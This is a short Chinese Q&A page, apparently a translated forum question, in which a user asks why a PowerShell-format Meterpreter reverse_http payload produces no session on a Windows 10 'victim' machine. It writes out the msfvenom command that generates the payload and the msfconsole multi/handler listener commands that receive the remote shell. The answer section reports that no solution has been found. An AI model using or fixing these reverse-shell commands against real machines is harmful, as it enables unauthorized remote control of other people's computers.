问题描述
我在攻击者的机器上生成了一个有效载荷:
msfvenom --payload windows/meterpreter/reverse_http --format psh -out meterpreter.ps1 LHOST=IP LPORT=80
然后我在攻击者的机器上启动监听器:
msfconsole
set multi/handler
set payload windows/meterpreter/reverse_http
set LHOST=HEREISTHEIP
set LPORT=80
exploit -j
但是在我在受害者的机器上运行 powershell 脚本后,我没有得到 Meterpreter 会话。
受害者的机器:Windows 10,64 位 攻击者的机器:Ubuntu 20.04
我做错了什么?
附言这个 exe 格式它正在工作!
解决方法
暂无找到可以解决该程序问题的有效方法,小编努力寻找整理中!
如果你已经找到好的解决方法,欢迎将解决方案带上本链接一起发送给小编。
小编邮箱:dio#foxmail.com (将#修改为@)